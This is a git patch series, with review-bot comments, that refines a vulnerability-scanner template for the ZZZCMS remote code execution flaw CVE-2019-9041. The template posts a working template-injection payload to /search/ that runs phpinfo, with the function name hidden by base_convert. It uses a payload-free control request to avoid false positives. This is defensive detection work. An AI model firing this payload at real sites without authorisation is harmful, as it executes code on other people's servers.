From 8e3d9c97ce604d0f2402c25ef4c4cdbfb73019d7 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?=
Date: Mon, 25 Sep 2023 16:24:23 +0200
Subject: [PATCH 1/3] ZZZCMS RCE is a false positive if we see phpinfo() without posting any data
---
 http/cves/2019/CVE-2019-9041.yaml | 15 ++++++++++++++-
 1 file changed, 14 insertions(+), 1 deletion(-)
diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml
index cef42a950c6..9cfe4a4be42 100644
--- a/http/cves/2019/CVE-2019-9041.yaml
+++ b/http/cves/2019/CVE-2019-9041.yaml
@@ -23,6 +23,13 @@ info:
 tags: cve,cve2019,zzzcms,rce,edb
 http:
+ - method: POST
+ path:
+ - "{{BaseURL}}/search/"
+
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+
 - method: POST
 path:
 - "{{BaseURL}}/search/"
@@ -36,7 +43,13 @@ http:
 matchers-condition: and
 matchers:
 - type: word
- part: body
+ part: body_1
+ words:
+ - "phpinfo"
+ negative: true
+
+ - type: word
+ part: body_2
 words:
 - "phpinfo"
 - "PHP Version"
From f188fcbe2f804f8e01b6657667517bc307d0bdb6 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?=
Date: Mon, 25 Sep 2023 16:28:43 +0200
Subject: [PATCH 2/3] more precise status code match
---
 http/cves/2019/CVE-2019-9041.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml
index 9cfe4a4be42..5e689dd94a7 100644
--- a/http/cves/2019/CVE-2019-9041.yaml
+++ b/http/cves/2019/CVE-2019-9041.yaml
@@ -54,6 +54,6 @@ http:
 - "phpinfo"
 - "PHP Version"
- - type: status
- status:
- - 200
+ - type: dsl
+ dsl:
+ - 'status_code_2 == 200'
From 59151619bc4440583ed658fc41d0364b58e9e405 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 26 Sep 2023 10:19:09 +0530
Subject: [PATCH 3/3] req and matcher update
---
 http/cves/2019/CVE-2019-9041.yaml | 40 ++++++++++---------------------
 1 file changed, 13 insertions(+), 27 deletions(-)
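Review bot: In PATCH 1/3, first hunk, the control request added at the top of `http:` posts to `/search/` with no body, so it is not a like-for-like baseline for the probe, which sends a `keys` parameter. A site that prints phpinfo output only on its search-results path would pass the negative check on `body_1` and still be reported. Giving the control a harmless search term, for example `body: keys=test` (constructed value), would make the two responses comparable. The same applies to the first raw request in PATCH 3/3, which also carries no body.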
diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml
index 5e689dd94a7..679baf3389d 100644
--- a/http/cves/2019/CVE-2019-9041.yaml
+++ b/http/cves/2019/CVE-2019-9041.yaml
@@ -23,37 +23,23 @@ info:
 tags: cve,cve2019,zzzcms,rce,edb
 http:
- - method: POST
- path:
- - "{{BaseURL}}/search/"
+ - raw:
+ - |
+ POST /search/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
- headers:
- Content-Type: application/x-www-form-urlencoded
+ - |
+ POST /search/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
- - method: POST
- path:
- - "{{BaseURL}}/search/"
+ keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}
- body: |
- keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}
-
- headers:
- Content-Type: application/x-www-form-urlencoded
-
- matchers-condition: and
 matchers:
- - type: word
- part: body_1
- words:
- - "phpinfo"
- negative: true
-
- - type: word
- part: body_2
- words:
- - "phpinfo"
- - "PHP Version"
-
 - type: dsl
 dsl:
 - 'status_code_2 == 200'
+ - '!contains(body_1, "phpinfo")'
+ - 'contains_all(body_2, "phpinfo","PHP Version")'
+ condition: and
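Review bot: The rewritten `raw` block has no comment saying that the first request is a payload-free control, so the two near-identical POSTs read like a duplicate and a later cleanup could remove the one that prevents the false positive. A line above the first entry such as `# request 1: control without payload; request 2: probe` would record the intent, and it matters because the DSL expressions depend on this order through `body_1` and `body_2`. It is also worth a comment next to the payload that `base_convert(27440799224,10,32)` evaluates to the string `phpinfo`, so the literal never appears in the request and a response that only reflects the request body cannot satisfy `contains_all`.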